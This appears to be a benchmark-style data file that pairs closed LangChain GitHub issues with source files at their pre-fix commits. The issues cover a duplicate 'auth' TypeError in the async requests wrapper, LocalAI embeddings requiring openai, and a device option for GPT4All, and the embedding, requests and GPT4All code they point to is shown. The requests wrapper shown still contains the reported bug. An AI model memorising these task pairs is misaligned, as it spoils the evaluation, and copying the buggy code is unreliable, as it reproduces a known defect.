"api_key": self.openai_api_key,
"organization": self.openai_organization,
"api_base": self.openai_api_base,
"api_type": self.openai_api_type,
"api_version": self.openai_api_version,
**self.model_kwargs,
}
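# Azure-style endpoints address the model by deployment name, passed
# through the "engine" parameter.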
if self.openai_api_type in ("azure", "azure_ad", "azuread"):
openai_args["engine"] = self.deployment
if self.openai_proxy:
try:
import openai
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
openai.proxy = {
"http": self.openai_proxy,
"https": self.openai_proxy,
}
return openai_args
def _get_len_safe_embeddings( |
self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None
) -> List[List[float]]:
embeddings: List[List[float]] = [[] for _ in range(len(texts))]
try:
import tiktoken
except ImportError:
raise ImportError(
"Could not import tiktoken python package. "
"This is needed in order to for OpenAIEmbeddings. "
"Please install it with `pip install tiktoken`."
)
tokens = []
indices = []
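# tokens collects context-window-sized token slices; indices maps each
# slice back to the index of the source text it was cut from.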
model_name = self.tiktoken_model_name or self.model |
try:
encoding = tiktoken.encoding_for_model(model_name)
except KeyError:
logger.warning("Warning: model not found. Using cl100k_base encoding.")
model = "cl100k_base"
encoding = tiktoken.get_encoding(model)
for i, text in enumerate(texts):
if self.model.endswith("001"):
text = text.replace("\n", " ")
token = encoding.encode(
text,
allowed_special=self.allowed_special,
disallowed_special=self.disallowed_special,
)
for j in range(0, len(token), self.embedding_ctx_length):
tokens.append(token[j : j + self.embedding_ctx_length])
indices.append(i)
batched_embeddings: List[List[float]] = []
_chunk_size = chunk_size or self.chunk_size
if self.show_progress_bar:
try:
from tqdm.auto import tqdm
_iter = tqdm(range(0, len(tokens), _chunk_size))
except ImportError:
_iter = range(0, len(tokens), _chunk_size)
else:
_iter = range(0, len(tokens), _chunk_size)
for i in _iter: |
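# Each request carries up to _chunk_size inputs. Deployments that accept
# only one input per request (e.g. some Azure setups, see issue #4575)
# need chunk_size=1.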
response = embed_with_retry(
self,
input=tokens[i : i + _chunk_size],
**self._invocation_params,
)
batched_embeddings.extend(r["embedding"] for r in response["data"])
results: List[List[List[float]]] = [[] for _ in range(len(texts))]
num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))]
for i in range(len(indices)):
if self.skip_empty and len(batched_embeddings[i]) == 1:
continue
results[indices[i]].append(batched_embeddings[i])
num_tokens_in_batch[indices[i]].append(len(tokens[i]))
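# Re-assemble per-text embeddings: take a token-count-weighted average of
# each text's slice embeddings, then L2-normalize the result.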
for i in range(len(texts)):
_result = results[i]
if len(_result) == 0:
average = embed_with_retry(
self,
input="",
**self._invocation_params,
)[
"data"
][0]["embedding"]
else:
average = np.average(_result, axis=0, weights=num_tokens_in_batch[i])
embeddings[i] = (average / np.linalg.norm(average)).tolist()
return embeddings
async def _aget_len_safe_embeddings( |
self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None
) -> List[List[float]]:
embeddings: List[List[float]] = [[] for _ in range(len(texts))]
try:
import tiktoken
except ImportError:
raise ImportError(
"Could not import tiktoken python package. "
"This is needed in order to for OpenAIEmbeddings. "
"Please install it with `pip install tiktoken`."
)
tokens = []
indices = []
model_name = self.tiktoken_model_name or self.model
try:
encoding = tiktoken.encoding_for_model(model_name)
except KeyError:
logger.warning("Warning: model not found. Using cl100k_base encoding.")
model = "cl100k_base"
encoding = tiktoken.get_encoding(model)
for i, text in enumerate(texts):
if self.model.endswith("001"):
text = text.replace("\n", " ")
token = encoding.encode(
text,
allowed_special=self.allowed_special,
disallowed_special=self.disallowed_special,
)
for j in range(0, len(token), self.embedding_ctx_length):
tokens.append(token[j : j + self.embedding_ctx_length])
indices.append(i)
batched_embeddings: List[List[float]] = []
_chunk_size = chunk_size or self.chunk_size
for i in range(0, len(tokens), _chunk_size):
response = await async_embed_with_retry(
self,
input=tokens[i : i + _chunk_size],
**self._invocation_params,
)
batched_embeddings.extend(r["embedding"] for r in response["data"])
results: List[List[List[float]]] = [[] for _ in range(len(texts))]
num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))]
for i in range(len(indices)):
results[indices[i]].append(batched_embeddings[i])
num_tokens_in_batch[indices[i]].append(len(tokens[i]))
for i in range(len(texts)):
_result = results[i]
if len(_result) == 0:
average = (
await async_embed_with_retry(
self,
input="",
**self._invocation_params,
)
)["data"][0]["embedding"]
else:
average = np.average(_result, axis=0, weights=num_tokens_in_batch[i])
embeddings[i] = (average / np.linalg.norm(average)).tolist()
return embeddings
def embed_documents(
self, texts: List[str], chunk_size: Optional[int] = 0
) -> List[List[float]]:
"""Call out to OpenAI's embedding endpoint for embedding search docs.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size of embeddings. If None, will use the chunk size
specified by the class.
Returns:
List of embeddings, one for each text.
"""
return self._get_len_safe_embeddings(texts, engine=self.deployment)
async def aembed_documents(
self, texts: List[str], chunk_size: Optional[int] = 0
) -> List[List[float]]:
"""Call out to OpenAI's embedding endpoint async for embedding search docs.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size of embeddings. If None, will use the chunk size
specified by the class.
Returns:
List of embeddings, one for each text.
"""
return await self._aget_len_safe_embeddings(texts, engine=self.deployment)
def embed_query(self, text: str) -> List[float]:
"""Call out to OpenAI's embedding endpoint for embedding query text.
Args:
text: The text to embed.
Returns:
Embedding for the text.
"""
return self.embed_documents([text])[0]
async def aembed_query(self, text: str) -> List[float]:
"""Call out to OpenAI's embedding endpoint async for embedding query text.
Args:
text: The text to embed.
Returns:
Embedding for the text.
"""
embeddings = await self.aembed_documents([text])
return embeddings[0] |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,842 | TypeError Due to Duplicate 'auth' Argument in aiohttp Request when provide header to APIChain | ### System Info
Langchain version: 0.0.253
Python:3.11
### Who can help?
@agola11 @hwchase17 @eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [X] Async
### Reproduction
1. Environment Setup:
Ensure you're using Python 3.11.
Install the necessary libraries and dependencies:
```bash
pip install fastapi uvicorn aiohttp langchain
```
2. APIChain Initialization:
Set up the APIChain utility using the provided API documentation and the chosen language model:
```python
from langchain import APIChain
chain = APIChain.from_llm_and_api_docs(api_docs=openapi.MY_API_DOCS, llm=chosen_llm, verbose=True, headers=headers)
```
3. Run the FastAPI application:
Use a tool like Uvicorn to start your FastAPI app:
```bash
uvicorn your_app_name:app --reload
```
4. Trigger the API Endpoint:
Make a request to the FastAPI endpoint that uses the APIChain utility. This could be through tools like curl, Postman, or directly from a browser, depending on how your API is set up.
Execute the Callback:
Inside the relevant endpoint, ensure you have the following snippet:
```python
with get_openai_callback() as cb:
response = await chain.arun(user_query)
```
5. Observe the Error:
You should encounter a TypeError indicating a conflict with the auth argument in the aiohttp.client.ClientSession.request() method. This happens because a header is provided to APIChain and it is then run with the ```arun``` method.
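A minimal sketch of the failure mode (names are illustrative): when a wrapper passes `auth` explicitly while the caller also supplies it through `**kwargs`, Python raises exactly this TypeError:
```python
def request(method, url, *, auth=None, **kwargs):
    return (method, url, auth, kwargs)

# auth arrives both explicitly and inside **kwargs:
request("GET", "https://example.com", auth="token", **{"auth": "token"})
# TypeError: request() got multiple values for keyword argument 'auth'
```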
### Expected behavior
Request Execution:
The chain.arun(user_query) method should interact with the intended external service or API without any issues.
The auth parameter, when used in the underlying request to the external service (in aiohttp), should be correctly applied without conflicts or multiple definitions. | https://github.com/langchain-ai/langchain/issues/8842 | https://github.com/langchain-ai/langchain/pull/11010 | 88a02076affa2accd0465ee5ea9848b68d0e812b | 956ee981c03874d6e413a51eed9f7b437e52f07c | "2023-08-06T23:55:31Z" | python | "2023-09-25T14:45:04Z" | libs/langchain/langchain/utilities/requests.py | """Lightweight wrapper around requests library, with async support."""
from contextlib import asynccontextmanager
from typing import Any, AsyncGenerator, Dict, Optional
import aiohttp
import requests
from langchain.pydantic_v1 import BaseModel, Extra
class Requests(BaseModel):
"""Wrapper around requests to handle auth and async.
The main purpose of this wrapper is to handle authentication (by saving
headers) and enable easy async methods on the same base object.
"""
headers: Optional[Dict[str, str]] = None
aiosession: Optional[aiohttp.ClientSession] = None
auth: Optional[Any] = None
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
arbitrary_types_allowed = True
def get(self, url: str, **kwargs: Any) -> requests.Response:
"""GET the URL and return the text."""
return requests.get(url, headers=self.headers, auth=self.auth, **kwargs)
def post(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response:
"""POST to the URL and return the text."""
return requests.post(
url, json=data, headers=self.headers, auth=self.auth, **kwargs
)
def patch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response:
"""PATCH the URL and return the text."""
return requests.patch(
url, json=data, headers=self.headers, auth=self.auth, **kwargs
)
def put(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response:
"""PUT the URL and return the text."""
return requests.put(
url, json=data, headers=self.headers, auth=self.auth, **kwargs
)
def delete(self, url: str, **kwargs: Any) -> requests.Response:
"""DELETE the URL and return the text."""
return requests.delete(url, headers=self.headers, auth=self.auth, **kwargs)
@asynccontextmanager
async def _arequest(
self, method: str, url: str, **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""Make an async request."""
if not self.aiosession:
async with aiohttp.ClientSession() as session:
async with session.request(
method, url, headers=self.headers, auth=self.auth, **kwargs
) as response:
yield response
else:
async with self.aiosession.request(
method, url, headers=self.headers, auth=self.auth, **kwargs
) as response:
yield response
@asynccontextmanager
async def aget(
self, url: str, **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""GET the URL and return the text asynchronously."""
async with self._arequest("GET", url, auth=self.auth, **kwargs) as response:
yield response
@asynccontextmanager
async def apost(
self, url: str, data: Dict[str, Any], **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""POST to the URL and return the text asynchronously."""
async with self._arequest(
"POST", url, json=data, **kwargs
) as response:
yield response
@asynccontextmanager
async def apatch(
self, url: str, data: Dict[str, Any], **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""PATCH the URL and return the text asynchronously."""
async with self._arequest(
"PATCH", url, json=data, **kwargs
) as response:
yield response
@asynccontextmanager
async def aput(
self, url: str, data: Dict[str, Any], **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""PUT the URL and return the text asynchronously."""
async with self._arequest(
"PUT", url, json=data, **kwargs
) as response:
yield response
@asynccontextmanager
async def adelete(
self, url: str, **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""DELETE the URL and return the text asynchronously."""
async with self._arequest("DELETE", url, auth=self.auth, **kwargs) as response:
yield response
class TextRequestsWrapper(BaseModel):
"""Lightweight wrapper around requests library.
The main purpose of this wrapper is to always return a text output.
"""
headers: Optional[Dict[str, str]] = None
aiosession: Optional[aiohttp.ClientSession] = None
auth: Optional[Any] = None
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
arbitrary_types_allowed = True
@property
def requests(self) -> Requests:
return Requests(
headers=self.headers, aiosession=self.aiosession, auth=self.auth
)
def get(self, url: str, **kwargs: Any) -> str:
"""GET the URL and return the text."""
return self.requests.get(url, **kwargs).text
def post(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""POST to the URL and return the text."""
return self.requests.post(url, data, **kwargs).text
def patch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""PATCH the URL and return the text."""
return self.requests.patch(url, data, **kwargs).text
def put(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""PUT the URL and return the text."""
return self.requests.put(url, data, **kwargs).text
def delete(self, url: str, **kwargs: Any) -> str:
"""DELETE the URL and return the text."""
return self.requests.delete(url, **kwargs).text
async def aget(self, url: str, **kwargs: Any) -> str:
"""GET the URL and return the text asynchronously."""
async with self.requests.aget(url, **kwargs) as response:
return await response.text()
async def apost(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""POST to the URL and return the text asynchronously."""
async with self.requests.apost(url, data, **kwargs) as response:
return await response.text()
async def apatch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""PATCH the URL and return the text asynchronously."""
async with self.requests.apatch(url, data, **kwargs) as response:
return await response.text()
async def aput(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""PUT the URL and return the text asynchronously."""
async with self.requests.aput(url, data, **kwargs) as response:
return await response.text()
async def adelete(self, url: str, **kwargs: Any) -> str:
"""DELETE the URL and return the text asynchronously."""
async with self.requests.adelete(url, **kwargs) as response:
return await response.text()
RequestsWrapper = TextRequestsWrapper |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,912 | LocalAI embeddings shouldn't require OpenAI | ### System Info
macOS Ventura 13.5.2, M1
### Who can help?
@mudler
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
https://github.com/langchain-ai/langchain/blob/v0.0.298/libs/langchain/langchain/embeddings/localai.py#L197
### Expected behavior
Why do LocalAI embeddings require OpenAI? LocalAI's embeddings have no need for OpenAI; it has a whole embeddings suite (https://localai.io/features/embeddings/) that can be called directly, for example:
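A hedged sketch (the endpoint path follows LocalAI's OpenAI-compatible API; the host and model name are assumptions for a local deployment) showing that no OpenAI key is needed:
```python
import requests

resp = requests.post(
    "http://localhost:8080/v1/embeddings",  # assumed local LocalAI instance
    json={"model": "bert-embeddings", "input": "what is a cat?"},  # model name is an assumption
)
vector = resp.json()["data"][0]["embedding"]
```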
I think it should be directly usable with its [`/embeddings` endpoint](https://github.com/go-skynet/LocalAI/blob/v1.25.0/api/api.go#L190) | https://github.com/langchain-ai/langchain/issues/10912 | https://github.com/langchain-ai/langchain/pull/10946 | 2c114fcb5ecc0a9e75e8acb63d9dd5b4a6ced9a9 | b11f21c25fc6accca7a6f325c1fd3e63dd5f91ea | "2023-09-22T00:17:24Z" | python | "2023-09-29T02:56:42Z" | libs/langchain/langchain/embeddings/localai.py | from __future__ import annotations
import logging
import warnings
from typing import (
Any,
Callable,
Dict,
List,
Literal,
Optional,
Sequence,
Set,
Tuple,
Union,
)
from tenacity import (
AsyncRetrying,
before_sleep_log,
retry,
retry_if_exception_type,
stop_after_attempt,
wait_exponential,
)
from langchain.pydantic_v1 import BaseModel, Extra, Field, root_validator
from langchain.schema.embeddings import Embeddings
from langchain.utils import get_from_dict_or_env, get_pydantic_field_names
logger = logging.getLogger(__name__)
def _create_retry_decorator(embeddings: LocalAIEmbeddings) -> Callable[[Any], Any]:
import openai
min_seconds = 4
max_seconds = 10
return retry(
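# Back off exponentially between min_seconds and max_seconds, and only
# retry the transient OpenAI-client errors listed below.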
reraise=True,
stop=stop_after_attempt(embeddings.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
def _async_retry_decorator(embeddings: LocalAIEmbeddings) -> Any:
import openai
min_seconds = 4
max_seconds = 10
async_retrying = AsyncRetrying(
reraise=True,
stop=stop_after_attempt(embeddings.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
def wrap(func: Callable) -> Callable:
async def wrapped_f(*args: Any, **kwargs: Any) -> Callable:
async for _ in async_retrying:
return await func(*args, **kwargs)
raise AssertionError("this is unreachable")
return wrapped_f
return wrap
def _check_response(response: dict) -> dict:
if any(len(d["embedding"]) == 1 for d in response["data"]):
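# A single-element vector is how LocalAI signals an empty/failed
# embedding; raising APIError lets the tenacity policy above retry.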
import openai
raise openai.error.APIError("LocalAI API returned an empty embedding")
return response
def embed_with_retry(embeddings: LocalAIEmbeddings, **kwargs: Any) -> Any:
"""Use tenacity to retry the embedding call."""
retry_decorator = _create_retry_decorator(embeddings)
@retry_decorator
def _embed_with_retry(**kwargs: Any) -> Any:
response = embeddings.client.create(**kwargs)
return _check_response(response)
return _embed_with_retry(**kwargs)
async def async_embed_with_retry(embeddings: LocalAIEmbeddings, **kwargs: Any) -> Any:
"""Use tenacity to retry the embedding call."""
@_async_retry_decorator(embeddings)
async def _async_embed_with_retry(**kwargs: Any) -> Any:
response = await embeddings.client.acreate(**kwargs)
return _check_response(response)
return await _async_embed_with_retry(**kwargs)
class LocalAIEmbeddings(BaseModel, Embeddings):
"""LocalAI embedding models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set to a random string. You need to
specify ``OPENAI_API_BASE`` to point to your LocalAI service endpoint.
Example:
.. code-block:: python
from langchain.embeddings import LocalAIEmbeddings
openai = LocalAIEmbeddings(
openai_api_key="random-key",
openai_api_base="http://localhost:8080"
)
"""
client: Any
model: str = "text-embedding-ada-002"
deployment: str = model
openai_api_version: Optional[str] = None
openai_api_base: Optional[str] = None
openai_proxy: Optional[str] = None
embedding_ctx_length: int = 8191
"""The maximum number of tokens to embed at once."""
openai_api_key: Optional[str] = None
openai_organization: Optional[str] = None
allowed_special: Union[Literal["all"], Set[str]] = set()
disallowed_special: Union[Literal["all"], Set[str], Sequence[str]] = "all"
chunk_size: int = 1000
"""Maximum number of texts to embed in each batch"""
max_retries: int = 6
"""Maximum number of retries to make when generating."""
request_timeout: Optional[Union[float, Tuple[float, float]]] = None
"""Timeout in seconds for the LocalAI request."""
headers: Any = None
show_progress_bar: bool = False
"""Whether to show a progress bar when embedding."""
model_kwargs: Dict[str, Any] = Field(default_factory=dict)
"""Holds any model parameters valid for `create` call not explicitly specified."""
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""Build extra kwargs from additional params that were passed in."""
all_required_field_names = get_pydantic_field_names(cls)
extra = values.get("model_kwargs", {})
for field_name in list(values):
if field_name in extra:
raise ValueError(f"Found {field_name} supplied twice.")
if field_name not in all_required_field_names:
warnings.warn(
f"""WARNING! {field_name} is not default parameter.
{field_name} was transferred to model_kwargs.
Please confirm that {field_name} is what you intended."""
)
extra[field_name] = values.pop(field_name)
invalid_model_kwargs = all_required_field_names.intersection(extra.keys())
if invalid_model_kwargs:
raise ValueError(
f"Parameters {invalid_model_kwargs} should be specified explicitly. "
f"Instead they were passed in as part of `model_kwargs` parameter."
)
values["model_kwargs"] = extra
return values
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and python package exists in environment."""
values["openai_api_key"] = get_from_dict_or_env(
values, "openai_api_key", "OPENAI_API_KEY"
)
values["openai_api_base"] = get_from_dict_or_env(
values,
"openai_api_base",
"OPENAI_API_BASE",
default="",
)
values["openai_proxy"] = get_from_dict_or_env(
values,
"openai_proxy",
"OPENAI_PROXY",
default="",
)
default_api_version = ""
values["openai_api_version"] = get_from_dict_or_env(
values,
"openai_api_version",
"OPENAI_API_VERSION",
default=default_api_version,
)
values["openai_organization"] = get_from_dict_or_env(
values,
"openai_organization",
"OPENAI_ORGANIZATION",
default="", |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,912 | LocalAI embeddings shouldn't require OpenAI | ### System Info
macOS Ventura 13.5.2, M1
### Who can help?
@mudler
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
https://github.com/langchain-ai/langchain/blob/v0.0.298/libs/langchain/langchain/embeddings/localai.py#L197
### Expected behavior
Why does LocalAI embeddings require OpenAI? I think LocalAI's embeddings has no need for OpenAI, it has a whole embeddings suite: https://localai.io/features/embeddings/
I think it should be directly usable with its [`/embeddings` endpoint](https://github.com/go-skynet/LocalAI/blob/v1.25.0/api/api.go#L190) | https://github.com/langchain-ai/langchain/issues/10912 | https://github.com/langchain-ai/langchain/pull/10946 | 2c114fcb5ecc0a9e75e8acb63d9dd5b4a6ced9a9 | b11f21c25fc6accca7a6f325c1fd3e63dd5f91ea | "2023-09-22T00:17:24Z" | python | "2023-09-29T02:56:42Z" | libs/langchain/langchain/embeddings/localai.py | )
try:
import openai
values["client"] = openai.Embedding
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
return values
@property
def _invocation_params(self) -> Dict:
openai_args = {
"model": self.model,
"request_timeout": self.request_timeout,
"headers": self.headers,
"api_key": self.openai_api_key,
"organization": self.openai_organization,
"api_base": self.openai_api_base,
"api_version": self.openai_api_version,
**self.model_kwargs,
}
if self.openai_proxy:
import openai
openai.proxy = {
"http": self.openai_proxy,
"https": self.openai_proxy,
}
return openai_args
def _embedding_func(self, text: str, *, engine: str) -> List[float]:
"""Call out to LocalAI's embedding endpoint."""
if self.model.endswith("001"):
text = text.replace("\n", " ")
return embed_with_retry(
self,
input=[text],
**self._invocation_params,
)["data"][
0
]["embedding"]
async def _aembedding_func(self, text: str, *, engine: str) -> List[float]:
"""Call out to LocalAI's embedding endpoint."""
if self.model.endswith("001"):
text = text.replace("\n", " ")
return (
await async_embed_with_retry(
self,
input=[text],
**self._invocation_params,
)
)["data"][0]["embedding"]
def embed_documents(
self, texts: List[str], chunk_size: Optional[int] = 0
) -> List[List[float]]:
"""Call out to LocalAI's embedding endpoint for embedding search docs.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size of embeddings. If None, will use the chunk size
specified by the class.
Returns:
List of embeddings, one for each text.
"""
return [self._embedding_func(text, engine=self.deployment) for text in texts]
async def aembed_documents(
self, texts: List[str], chunk_size: Optional[int] = 0
) -> List[List[float]]:
"""Call out to LocalAI's embedding endpoint async for embedding search docs.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size of embeddings. If None, will use the chunk size
specified by the class.
Returns:
List of embeddings, one for each text.
"""
embeddings = []
for text in texts:
response = await self._aembedding_func(text, engine=self.deployment)
embeddings.append(response)
return embeddings
def embed_query(self, text: str) -> List[float]:
"""Call out to LocalAI's embedding endpoint for embedding query text.
Args:
text: The text to embed.
Returns:
Embedding for the text.
"""
embedding = self._embedding_func(text, engine=self.deployment)
return embedding
async def aembed_query(self, text: str) -> List[float]:
"""Call out to LocalAI's embedding endpoint async for embedding query text.
Args:
text: The text to embed.
Returns:
Embedding for the text.
"""
embedding = await self._aembedding_func(text, engine=self.deployment)
return embedding |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,486 | Add device to GPT4All | ### Feature request
Hey guys!
Thanks for the great tool you've developed.
LLama now supports device and so is GPT4All:
https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__
Can you guys please add the device property to the file: "langchain/llms/gpt4all.py"
LN 96:
```python
device: Optional[str] = Field("cpu", alias="device")
"""Device name: cpu, gpu, nvidia, intel, amd or DeviceName."""
```
Model Init:
```python
values["client"] = GPT4AllModel(
    model_name,
    model_path=model_path or None,
    model_type=values["backend"],
    allow_download=values["allow_download"],
    device=values["device"],
)
```
### Motivation
Necessity to use the device on GPU-powered machines.
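A hedged sketch of what the requested wiring would enable from LangChain (the `device` keyword mirrors the gpt4all-python API; "gpu" is an example value):
```python
from langchain.llms import GPT4All

# Assumes the device parameter is plumbed through to gpt4all.GPT4All.
llm = GPT4All(model="./models/gpt4all-model.bin", device="gpu")
print(llm("Once upon a time, "))
```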
### Your contribution
None.. :( | https://github.com/langchain-ai/langchain/issues/10486 | https://github.com/langchain-ai/langchain/pull/11216 | 92683262f4a6c2db95c3aad40a6f6dfde2df43d1 | c6d7124675902e3a2628559d8a2b22c30747f75d | "2023-09-12T09:02:19Z" | python | "2023-10-04T00:37:30Z" | libs/langchain/langchain/llms/gpt4all.py | from functools import partial
from typing import Any, Dict, List, Mapping, Optional, Set
from langchain.callbacks.manager import CallbackManagerForLLMRun
from langchain.llms.base import LLM
from langchain.llms.utils import enforce_stop_tokens
from langchain.pydantic_v1 import Extra, Field, root_validator
class GPT4All(LLM): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,486 | Add device to GPT4All | ### Feature request
Hey guys!
Thanks for the great tool you've developed.
LLaMA now supports selecting a device, and so does GPT4All:
https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__
Can you guys please add the device property to the file: "langchain/llms/gpt4all.py"
LN 96:
`
device: Optional[str] = Field("cpu", alias="device")
"""Device name: cpu, gpu, nvidia, intel, amd or DeviceName."""
`
Model Init:
`
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
device=values["device"]
)
`
### Motivation
It is necessary to be able to select the device on GPU-powered machines.
### Your contribution
None.. :( | https://github.com/langchain-ai/langchain/issues/10486 | https://github.com/langchain-ai/langchain/pull/11216 | 92683262f4a6c2db95c3aad40a6f6dfde2df43d1 | c6d7124675902e3a2628559d8a2b22c30747f75d | "2023-09-12T09:02:19Z" | python | "2023-10-04T00:37:30Z" | libs/langchain/langchain/llms/gpt4all.py | """GPT4All language models.
To use, you should have the ``gpt4all`` python package installed, the
pre-trained model file, and the model's config information.
Example:
.. code-block:: python
from langchain.llms import GPT4All
model = GPT4All(model="./models/gpt4all-model.bin", n_threads=8)
# Simplest invocation
response = model("Once upon a time, ")
"""
model: str
"""Path to the pre-trained GPT4All model file."""
backend: Optional[str] = Field(None, alias="backend")
max_tokens: int = Field(200, alias="max_tokens")
"""Token context window."""
n_parts: int = Field(-1, alias="n_parts")
"""Number of parts to split the model into.
If -1, the number of parts is automatically determined."""
seed: int = Field(0, alias="seed")
"""Seed. If -1, a random seed is used."""
f16_kv: bool = Field(False, alias="f16_kv")
"""Use half-precision for key/value cache."""
logits_all: bool = Field(False, alias="logits_all")
"""Return logits for all tokens, not just the last token."""
vocab_only: bool = Field(False, alias="vocab_only")
"""Only load the vocabulary, no weights.""" |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,486 | Add device to GPT4All | ### Feature request
Hey guys!
Thanks for the great tool you've developed.
LLaMA now supports selecting a device, and so does GPT4All:
https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__
Can you guys please add the device property to the file: "langchain/llms/gpt4all.py"
LN 96:
`
device: Optional[str] = Field("cpu", alias="device")
"""Device name: cpu, gpu, nvidia, intel, amd or DeviceName."""
`
Model Init:
`
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
device=values["device"]
)
`
### Motivation
It is necessary to be able to select the device on GPU-powered machines.
### Your contribution
None.. :( | https://github.com/langchain-ai/langchain/issues/10486 | https://github.com/langchain-ai/langchain/pull/11216 | 92683262f4a6c2db95c3aad40a6f6dfde2df43d1 | c6d7124675902e3a2628559d8a2b22c30747f75d | "2023-09-12T09:02:19Z" | python | "2023-10-04T00:37:30Z" | libs/langchain/langchain/llms/gpt4all.py | use_mlock: bool = Field(False, alias="use_mlock")
"""Force system to keep model in RAM."""
embedding: bool = Field(False, alias="embedding")
"""Use embedding mode only."""
n_threads: Optional[int] = Field(4, alias="n_threads")
"""Number of threads to use."""
n_predict: Optional[int] = 256
"""The maximum number of tokens to generate."""
temp: Optional[float] = 0.7
"""The temperature to use for sampling."""
top_p: Optional[float] = 0.1
"""The top-p value to use for sampling."""
top_k: Optional[int] = 40
"""The top-k value to use for sampling."""
echo: Optional[bool] = False
"""Whether to echo the prompt."""
stop: Optional[List[str]] = []
"""A list of strings to stop generation when encountered."""
repeat_last_n: Optional[int] = 64
"Last n tokens to penalize"
repeat_penalty: Optional[float] = 1.18
"""The penalty to apply to repeated tokens."""
n_batch: int = Field(8, alias="n_batch")
"""Batch size for prompt processing."""
streaming: bool = False
"""Whether to stream the results or not."""
allow_download: bool = False
"""If model does not exist in ~/.cache/gpt4all/, download it."""
client: Any = None
class Config: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,486 | Add device to GPT4All | ### Feature request
Hey guys!
Thanks for the great tool you've developed.
LLaMA now supports selecting a device, and so does GPT4All:
https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__
Can you guys please add the device property to the file: "langchain/llms/gpt4all.py"
LN 96:
`
device: Optional[str] = Field("cpu", alias="device")
"""Device name: cpu, gpu, nvidia, intel, amd or DeviceName."""
`
Model Init:
`
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
device=values["device"]
)
`
### Motivation
